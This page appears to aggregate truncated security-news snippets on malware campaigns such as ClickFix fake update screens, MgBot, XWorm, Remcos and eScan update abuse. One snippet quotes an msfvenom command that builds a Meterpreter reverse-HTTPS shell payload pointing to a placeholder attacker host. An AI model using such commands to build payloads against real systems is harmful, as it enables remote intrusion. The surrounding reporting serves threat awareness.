China-linked Evasive Panda used DNS poisoning to deliver the MgBot backdoor in targeted espionage attacks from 2022 to 2024.

The ClickFix campaign disguises malware as legitimate Windows updates, using steganography to hide shellcode in PNG files and bypass security detection systems.

Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with ...

A fresh wave of ClickFix attacks is using fake Windows update screens to trick victims into downloading infostealer malware.… ClickFix is a type of social engineering technique that tricks users into ...

The threat actor behind Operation ForumTroll used the same toolset typically employed in Dante spyware attacks. The exploitation of the first Chrome zero-day of 2025 is linked to tools used in attacks ...

In a newly disclosed multi-stage threat campaign, attackers were seen skipping disk and leaning on in-memory tricks to deliver the XWorm remote access trojan (RAT). According to Forcepoint Labs’ ...

Remcos RAT gets a stealthy upgrade as attackers ditch old office exploits for a fileless PowerShell loader that runs entirely in memory. Threat actors have been spotted using a PowerShell-based ...

Windows 11 might be the latest version of Windows, but if you still use Windows 10 and need to "clean install" the operating system, or install or upgrade to it for the first time on an older PC, ...

How come there are no user-agent strings embedded in the shellcode when using this command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=443 ...

A new malware campaign has been exploiting the updating mechanism of the eScan antivirus software to distribute backdoors and cryptocurrency miners like XMRig through a long-standing threat codenamed ...